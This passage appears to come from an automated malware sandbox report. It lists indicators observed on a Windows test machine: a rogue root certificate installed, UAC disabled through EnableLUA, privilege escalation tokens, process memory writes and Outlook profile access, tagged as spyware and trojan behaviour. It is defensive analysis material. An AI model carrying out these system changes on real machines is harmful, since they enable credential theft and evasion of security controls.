Set value (data) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2\MRUListEx = ffffffff C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\Shell\SniffedFolderType = "Generic" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 0100000000000000ffffffff C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\SniffedFolderType = "Documents" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656} C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 = 14002e80922b16d365937a46956b92703aca08af0000 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = [certificate blob omitted] C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\ld.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\ld.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\random.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\random.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\lenin.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\lenin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
N/A N/A C:\Users\Admin\Pictures\n5iRSINSSBZXYf0VMxnR1Gr6.exe N/A
N/A N/A C:\Users\Admin\Pictures\n5iRSINSSBZXYf0VMxnR1Gr6.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Users\Admin\Pictures\n5iRSINSSBZXYf0VMxnR1Gr6.exe N/A
N/A N/A C:\Users\Admin\Pictures\n5iRSINSSBZXYf0VMxnR1Gr6.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious behavior: RenamesItself

Description Indicator Process Target
N/A N/A C:\Users\Admin\Desktop\a\ld.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\New Text Document.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\a\volumeinfo.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\go.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\go.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\go.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\go.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\go.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\go.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\go.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\go.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\go.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\go.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\go.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\go.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\go.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\go.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\go.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\go.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\go.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\go.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\go.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\go.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\go.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\go.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 748 wrote to memory of 1620 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 748 wrote to memory of 1620 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 748 wrote to memory of 1096 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 748 wrote to memory of 1096 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 748 wrote to memory of 1096 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 748 wrote to memory of 1096 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 748 wrote to memory of 1096 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 748 wrote to memory of 1096 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 748 wrote to memory of 1096 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 748 wrote to memory of 1096 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 748 wrote to memory of 1096 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 748 wrote to memory of 1096 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 748 wrote to memory of 1096 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 748 wrote to memory of 1096 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 748 wrote to memory of 1096 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 748 wrote to memory of 1096 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 748 wrote to memory of 1096 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 748 wrote to memory of 4408 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 748 wrote to memory of 2720 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\shutdownwithoutlogon = "0" C:\Users\Admin\Desktop\a\ld.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\Pictures\WeQEAW3kaoXuMbb80vOzIlmY.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\Desktop\a\New.exe N/A

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A

outlook_win_path

Description Indicator Process Target
